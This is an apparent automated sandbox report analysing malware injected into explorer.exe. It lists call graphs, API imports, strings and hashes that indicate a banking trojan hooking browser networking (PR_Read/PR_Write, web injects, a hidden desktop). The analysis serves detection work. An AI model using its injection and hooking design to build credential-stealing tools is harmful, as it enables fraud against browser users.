31630->31632 31633 10a5274c 31631->31633 31634 10a52759 31631->31634 31632->31583 31633->31583 31635 10a696cc malloc 36 API calls 31634->31635 31636 10a5276b 31635->31636 31637 10a52783 MultiByteToWideChar 31636->31637 31638 10a52773 31636->31638 31637->31632 31638->31583 31639->31590 31640->31600 31641->31586 31642->31589 31643->31597 31644->31601 31645->31626 31646->31626 31648->31621 31649->31627 31650->31619 31651->31616 31652->31619 31653 10a58070 31660 10a57e80 31653->31660 31655 10a580f3 31656 10a580b0 OpenThread 31657 10a5809c __termconin 31656->31657 31658 10a580cc SuspendThread 31656->31658 31657->31655 31657->31656 31668 10a58470 31658->31668 31661 10a57ea6 realloc _DllMainCRTStartup _getptd_noexit 31660->31661 31664 10a57f60 Thread32Next 31661->31664 31665 10a57f7d __termconin 31661->31665 31666 10a57efb HeapAlloc 31661->31666 31662 10a69fd0 _cftof_l 3 API calls 31663 10a57f93 31662->31663 31663->31657 31664->31661 31664->31665 31665->31662 31666->31665 31667 10a57f1f 31666->31667 31667->31661 31669 10a584aa _DllMainCRTStartup 31668->31669 31670 10a69fd0 _cftof_l 3 API calls 31669->31670 31671 10a585a3 31670->31671 31671->31657 31672 10a67bc0 31673 10a67bd0 OpenMutexA CloseHandle 31672->31673 31674 10a67bf5 31673->31674 31675 10a67bfa Sleep SleepEx 31673->31675 31677 10a67ac0 26 API calls 3 library calls 31674->31677 31677->31675 31678 10a6ae6c 31679 10a6ae88 31678->31679 31681 10a6ae8d 31678->31681 31692 10a72668 GetSystemTimeAsFileTime GetTickCount64 GetTickCount64 QueryPerformanceCounter _getptd_noexit 31679->31692 31682 10a6af18 31681->31682 31690 10a6aee2 31681->31690 31693 10a6ad14 63 API calls 16 library calls 31681->31693 31682->31690 31694 10a67c10 31682->31694 31684 10a6af36 31685 10a6af5f 31684->31685 31687 10a67c10 _DllMainCRTStartup 177 API calls 31684->31687 31685->31690 31704 10a6ad14 63 API calls 16 library calls 31685->31704 31689 10a6af52 31687->31689 31703 10a6ad14 63 API calls 16 library calls 31689->31703 31692->31681 31693->31682 31695 10a67c30 _DllMainCRTStartup 31694->31695 31696 10a67c18 31694->31696 31750 10a583f0 15 API calls _DllMainCRTStartup 31695->31750 31697 10a67c3c 31696->31697 31705 10a550e0 LoadLibraryA GetProcAddress 31696->31705 31697->31684 31703->31685 31704->31690 31706 10a55c61 13 API calls 31705->31706 31707 10a55d67 _DllMainCRTStartup 31706->31707 31751 10a598e0 MultiByteToWideChar MultiByteToWideChar 31707->31751 31709 10a56c37 31752 10a598e0 MultiByteToWideChar MultiByteToWideChar 31709->31752 31711 10a56c4a 31753 10a598e0 MultiByteToWideChar MultiByteToWideChar 31711->31753 31713 10a56c5d 31754 10a598e0 MultiByteToWideChar MultiByteToWideChar 31713->31754 31715 10a56c70 31755 10a598e0 MultiByteToWideChar MultiByteToWideChar 31715->31755 31717 10a56c83 31756 10a598e0 MultiByteToWideChar MultiByteToWideChar 31717->31756 31719 10a56c96 31720 10a67920 31719->31720 31757 10a59990 31720->31757 31723 10a679f2 lstrcmpiA 31726 10a67a06 31723->31726 31727 10a67a0b lstrcmpiA 31723->31727 31724 10a6798d 31759 10a51c60 31724->31759 31773 10a66650 41 API calls _DllMainCRTStartup 31726->31773 31728 10a67a26 lstrcmpiA 31727->31728 31729 10a67a1f 31727->31729 31732 10a67a42 lstrcmpiA 31728->31732 31733 10a67a3a 31728->31733 31774 10a65d60 115 API calls 3 library calls 31729->31774 31736 10a67a56 31732->31736 31737 10a67a5e lstrcmpiA 31732->31737 31775 10a65d60 115 API calls 3 library calls 31733->31775 31734 10a6799a _DllMainCRTStartup 31738 10a679b9 OpenMutexA WaitForSingleObject CloseHandle 31734->31738 31776 10a65d60 115 API calls 3 library calls 31736->31776 31740 10a67a72 31737->31740 31741 10a67a7a lstrcmpiA 31737->31741 31772 10a67ac0 26 API calls 3 library calls 31738->31772 31777 10a65d60 115 API calls 3 library calls 31740->31777 31745 10a67a96 31741->31745 31746 10a67a9e 31741->31746 31744 10a679ea 31744->31723 31778 10a65d60 115 API calls 3 library calls 31745->31778 31748 10a69fd0 _cftof_l 3 API calls 31746->31748 31749 10a67ab0 31748->31749 31749->31684 31750->31697 31751->31709 31752->31711 31753->31713 31754->31715 31755->31717 31756->31719 31758 10a5999c GetModuleFileNameA PathFindFileNameA lstrcmpiA 31757->31758 31758->31723 31758->31724 31779 10a59450 31759->31779 31763 10a51c9b _DllMainCRTStartup 31796 10a58380 31763->31796 31765 10a51cb8 31802 10a582b0 31765->31802 31768 10a582b0 _DllMainCRTStartup GetProcAddress 31769 10a51cfa _DllMainCRTStartup 31768->31769 31770 10a69fd0 _cftof_l 3 API calls 31769->31770 31771 10a51d13 31770->31771 31771->31734 31772->31744 31774->31728 31775->31732 31776->31737 31777->31741 31778->31746 31805 10a59320 31779->31805 31782 10a594e4 _DllMainCRTStartup 31783 10a594f2 lstrcatW lstrcatW lstrcatW 31782->31783 31784 10a69fd0 _cftof_l 3 API calls 31783->31784 31785 10a51c83 31784->31785 31786 10a59740 CreateFileW 31785->31786 31787 10a59790 _DllMainCRTStartup 31786->31787 31788 10a59783 31786->31788 31789 10a597ad GetProcessHeap HeapAlloc 31787->31789 31788->31763 31790 10a59810 __termconin _Getctype 31789->31790 31791 10a597d2 ReadFile 31789->31791 31790->31763 31792 10a597ef 31791->31792 31793 10a597f9 GetProcessHeap HeapFree 31791->31793 31792->31793 31794 10a5981d _DllMainCRTStartup 31792->31794 31793->31790 31794->31790 31795 10a59861 GetProcessHeap HeapAlloc 31794->31795 31795->31790 31797 10a57e30 _DllMainCRTStartup Sleep 31796->31797 31798 10a5838d 31797->31798 31799 10a58396 HeapCreate 31798->31799 31800 10a583d3 _DllMainCRTStartup 31798->31800 31801 10a583af _DllMainCRTStartup 31799->31801 31800->31765 31801->31765 31810 10a582d0 31802->31810 31804 10a51cd9 31804->31768 31806 10a59379 _DllMainCRTStartup 31805->31806 31807 10a59407 wsprintfW 31806->31807 31808 10a69fd0 _cftof_l 3 API calls 31807->31808 31809 10a5943b SHGetFolderPathW lstrcatW lstrcatW 31808->31809 31809->31782 31811 10a582ee __crtIsPackagedApp 31810->31811 31812 10a582f3 31811->31812 31813 10a58308 GetProcAddress 31811->31813 31812->31804 31814 10a5831c 31813->31814 31814->31804

                                                                                        Executed Functions

                                                                                        Function 10A550E0 Relevance: 650.4, APIs: 171, Strings: 200, Instructions: 1133libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                        • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$chunked$close$closesocket$connect$firefox.exe$free$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                        • API String ID: 2683923594-2783081390
                                                                                        • Opcode ID: f1daa5211395680f3f5c65087694303f7989fd7500663c9bb10338a0adaf5319
                                                                                        • Instruction ID: 9fea46f7be267c082ea80debf7026587fd2af04f32d1205bc19ddd8050e58a2f
                                                                                        • Opcode Fuzzy Hash: f1daa5211395680f3f5c65087694303f7989fd7500663c9bb10338a0adaf5319
                                                                                        • Instruction Fuzzy Hash: A6034879742F0599EA409B55F8847D633B9BF49B99FC0822AD8C903725EFB8E1D4C342
                                                                                        Function 10A517F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                        • API String ID: 3240663557-511764017
                                                                                        • Opcode ID: 9116a946a4ba4c64eb93576db9d4acad628b11f9dd566b416aba000ba00c21cb
                                                                                        • Instruction ID: fc3a6cd62d5cdafe2689366f1004705ea53db6eb5648a42be779a3d970eb6917
                                                                                        • Opcode Fuzzy Hash: 9116a946a4ba4c64eb93576db9d4acad628b11f9dd566b416aba000ba00c21cb
                                                                                        • Instruction Fuzzy Hash: 20C17036704B45C6EB14CF22E8543E977A1FB89B88F804119DE8E47B28DF79D18ACB41
                                                                                        Function 10A57E80 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 448 10a57e80-10a57ead call 10a67f7c 451 10a57f86-10a57f9d call 10a69fd0 448->451 452 10a57eb3-10a57ec3 call 10a67f94 448->452 455 10a57ec8-10a57eca 452->455 457 10a57ed0-10a57ed5 455->457 458 10a57f7d-10a57f80 call 10a7c030 455->458 459 10a57f60-10a57f77 Thread32Next 457->459 460 10a57edb-10a57ee5 call 10a7c170 457->460 458->451 459->457 459->458 460->459 464 10a57ee7-10a57ef1 call 10a7c178 460->464 464->459 467 10a57ef3-10a57ef9 464->467 468 10a57f21-10a57f27 467->468 469 10a57efb-10a57f1d HeapAlloc 467->469 471 10a57f50-10a57f5d 468->471 472 10a57f29-10a57f43 call 10a7c160 468->472 469->458 470 10a57f1f 469->470 470->471 471->459 472->458 475 10a57f45-10a57f4d 472->475 475->471
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                        • String ID:
                                                                                        • API String ID: 3234909527-0
                                                                                        • Opcode ID: dd7448d3b2258390942cc6f186a652c137c1e7a8dbb80dfcbe5928b89c6b3c77
                                                                                        • Instruction ID: ca9477985e78258ddae1a345ee866e8ea26ebf7226a66d3f898c02576f7f331d
                                                                                        • Opcode Fuzzy Hash: dd7448d3b2258390942cc6f186a652c137c1e7a8dbb80dfcbe5928b89c6b3c77
                                                                                        • Instruction Fuzzy Hash: 0A317C32204B4486EB10CF21F45075EB7A1FB89BD8F848229EA9D47798EF7CC949CB41
                                                                                        Function 10A67920 Relevance: 36.8, APIs: 13, Strings: 8, Instructions: 92stringsynchronizationthreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32 ref: 10A67965
                                                                                        • PathFindFileNameA.SHLWAPI ref: 10A67970
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67983
                                                                                        • CreateThread.KERNEL32 ref: 10A679B3
                                                                                        • OpenMutexA.KERNEL32 ref: 10A679C7
                                                                                        • WaitForSingleObject.KERNEL32 ref: 10A679D6
                                                                                        • CloseHandle.KERNEL32 ref: 10A679DF
                                                                                          • Part of subcall function 10A67AC0: Sleep.KERNEL32 ref: 10A67AE0
                                                                                          • Part of subcall function 10A67AC0: CreateProcessW.KERNEL32 ref: 10A67B7D
                                                                                          • Part of subcall function 10A67AC0: CloseHandle.KERNEL32 ref: 10A67B88
                                                                                          • Part of subcall function 10A67AC0: CloseHandle.KERNEL32 ref: 10A67B93
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A679FC
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67A15
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67A30
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67A4C
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67A68
                                                                                        • lstrcmpiA.KERNEL32 ref: 10A67A84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmpi$CloseHandle$CreateFileName$FindModuleMutexObjectOpenPathProcessSingleSleepThreadWait
                                                                                        • String ID: GqgWzd$brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe
                                                                                        • API String ID: 1629314801-3734278510
                                                                                        • Opcode ID: eb0479131c42b16b6b4081117822567d2d2ea32956ea4494d5a100202a859142
                                                                                        • Instruction ID: 2de34d26c2443e56b41233df305c716e7efd2ed940203237438e2e10a15c0007
                                                                                        • Opcode Fuzzy Hash: eb0479131c42b16b6b4081117822567d2d2ea32956ea4494d5a100202a859142
                                                                                        • Instruction Fuzzy Hash: 9741AB35324B8585EB54DB21ED547EE33A1FF88BC5FC49029E98A47664EFB8C189C701
                                                                                        Function 10A59740 Relevance: 16.6, APIs: 11, Instructions: 112memoryfileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 3250796435-0
                                                                                        • Opcode ID: b053f56393df49f046b32c5de7bfa3eb887973084eefd092d2588bea67fd372c
                                                                                        • Instruction ID: bf27700add7fb9793fdd23f370c3ecb1659e8a04adfa900b7eb95cb1748ac5f5
                                                                                        • Opcode Fuzzy Hash: b053f56393df49f046b32c5de7bfa3eb887973084eefd092d2588bea67fd372c
                                                                                        • Instruction Fuzzy Hash: EE41BE31310B45C6EB408F26A84479A77A4FB8ABD4F458229DE8E47B54EF39D18AC710
                                                                                        Function 10A59450 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53stringCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 10A59320: GetWindowsDirectoryW.KERNEL32 ref: 10A59373
                                                                                          • Part of subcall function 10A59320: GetVolumeInformationW.KERNEL32 ref: 10A593C2
                                                                                          • Part of subcall function 10A59320: wsprintfW.USER32 ref: 10A59424
                                                                                        • SHGetFolderPathW.SHELL32 ref: 10A594B5
                                                                                        • lstrcatW.KERNEL32 ref: 10A594C5
                                                                                        • lstrcatW.KERNEL32 ref: 10A594D3
                                                                                        • CreateDirectoryW.KERNEL32 ref: 10A594DE
                                                                                        • SetFileAttributesW.KERNEL32 ref: 10A594EC
                                                                                        • lstrcatW.KERNEL32 ref: 10A594FC
                                                                                        • lstrcatW.KERNEL32 ref: 10A5950A
                                                                                        • lstrcatW.KERNEL32 ref: 10A5951A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: f90fdb875df4c0880741e59481e3687812dbb59c7a4731152bb87a914a6291e9
                                                                                        • Instruction ID: e58e7326d205937108af72f7f6b2279a61c9dc9f39ba7dfe8f4bff1930ea15e1
                                                                                        • Opcode Fuzzy Hash: f90fdb875df4c0880741e59481e3687812dbb59c7a4731152bb87a914a6291e9
                                                                                        • Instruction Fuzzy Hash: 57215632318B4586EB50CF21F81839D33A0FB89781F81A139EA9E87714EF7AC148C701
                                                                                        Function 10A59320 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                        • API String ID: 3001812590-1109288774
                                                                                        • Opcode ID: df5d9908c95f7d8336e596820d4d77060eeafd59264599216909aa6997f467bc
                                                                                        • Instruction ID: 1eec3e5a1a9d0ee04fac7c2aa687fa2c8734e70981bc20aba2e386e5cb98d204
                                                                                        • Opcode Fuzzy Hash: df5d9908c95f7d8336e596820d4d77060eeafd59264599216909aa6997f467bc
                                                                                        • Instruction Fuzzy Hash: 7A310936228780D6D710CF65E49079AB7B4FB99384F94502AEB8987A28EB7DC549CF10
                                                                                        Function 10A67BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 496 10a67bc0-10a67bf3 OpenMutexA CloseHandle 498 10a67bf5 call 10a67ac0 496->498 499 10a67bfa-10a67c05 Sleep SleepEx 496->499 498->499
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMutexOpenSleep
                                                                                        • String ID: GqgWzd
                                                                                        • API String ID: 2969294566-924881338
                                                                                        • Opcode ID: 79162a518d3862c3d10ef4fc500bb2e324edf4a6fcd8fa739012e5a10f70a2b3
                                                                                        • Instruction ID: d21a6b62175307b2489e4e623cb85e16782b36d5d01f94ddf78c2e16cbd1a17d
                                                                                        • Opcode Fuzzy Hash: 79162a518d3862c3d10ef4fc500bb2e324edf4a6fcd8fa739012e5a10f70a2b3
                                                                                        • Instruction Fuzzy Hash: 0FE0123072164585EA48ABA198143D966B1FF5DB85F888438D98B17750FE7844C48382
                                                                                        Function 10A585B0 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 501 10a585b0-10a585bd 502 10a5861f-10a58624 501->502 503 10a585bf-10a585c9 501->503 504 10a58608-10a5861a HeapFree 503->504 505 10a585cb 503->505 504->502 506 10a585d0-10a585e8 OpenThread 505->506 507 10a585fc-10a58601 506->507 508 10a585ea-10a585f6 ResumeThread call 10a7c030 506->508 507->506 509 10a58603 507->509 508->507 509->504
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                        • String ID:
                                                                                        • API String ID: 993137029-0
                                                                                        • Opcode ID: 59f3469ddf091b275de81399f9844ce56b3cf2b451bb9255c0b4d555c76b038d
                                                                                        • Instruction ID: c749a10f4c4e6a337ff1864d45e81b2f1da0595525bded6fd1989226f3dbfd4c
                                                                                        • Opcode Fuzzy Hash: 59f3469ddf091b275de81399f9844ce56b3cf2b451bb9255c0b4d555c76b038d
                                                                                        • Instruction Fuzzy Hash: 3E016936616B84C2EB44CF26E8903597361FB88FD4F848029DB4A13B24DF79D5AACB00
                                                                                        Function 10A570E0 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 511 10a570e0-10a57113 GetSystemInfo 512 10a57115-10a5711f 511->512 513 10a57123-10a57142 511->513 512->513 514 10a57144-10a57147 513->514 515 10a57161-10a5716c 513->515 516 10a57159-10a5715f 514->516 517 10a57149-10a5714c 514->517 518 10a571b1-10a571b4 515->518 519 10a5716e 515->519 516->514 516->515 517->516 522 10a5714e-10a57153 517->522 520 10a571b6-10a571b9 518->520 521 10a57201-10a57214 518->521 523 10a57170-10a57186 call 10a56fd0 519->523 524 10a5724d 520->524 525 10a571bf 520->525 528 10a57220-10a5723a 521->528 522->516 526 10a57252-10a57269 522->526 523->518 533 10a57188-10a5719c call 10a7c138 523->533 524->526 529 10a571c0-10a571d6 call 10a56f30 525->529 528->528 531 10a5723c-10a57246 528->531 529->524 536 10a571d8-10a571f8 call 10a7c138 529->536 531->524 537 10a571a2-10a571a8 533->537 536->521 542 10a571fa-10a571fd 536->542 537->521 538 10a571aa-10a571ad 537->538 538->523 540 10a571af 538->540 540->520 542->529 543 10a571ff 542->543 543->524
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2622297391-0
                                                                                        • Opcode ID: de47bf02c65525b3e5c5cf2996757f4f8b689eee8957f68bae87d5d5efbacf57
                                                                                        • Instruction ID: 5049615fa7756c09d6c386a8a0006cf8aef2c94907effb2eb3a4c5630a328256
                                                                                        • Opcode Fuzzy Hash: de47bf02c65525b3e5c5cf2996757f4f8b689eee8957f68bae87d5d5efbacf57
                                                                                        • Instruction Fuzzy Hash: 64316931712B5185EF118F12F41039E7AA1FB49BC8F484235EF8D2BB28EB79C8898741
                                                                                        Function 10A57D20 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
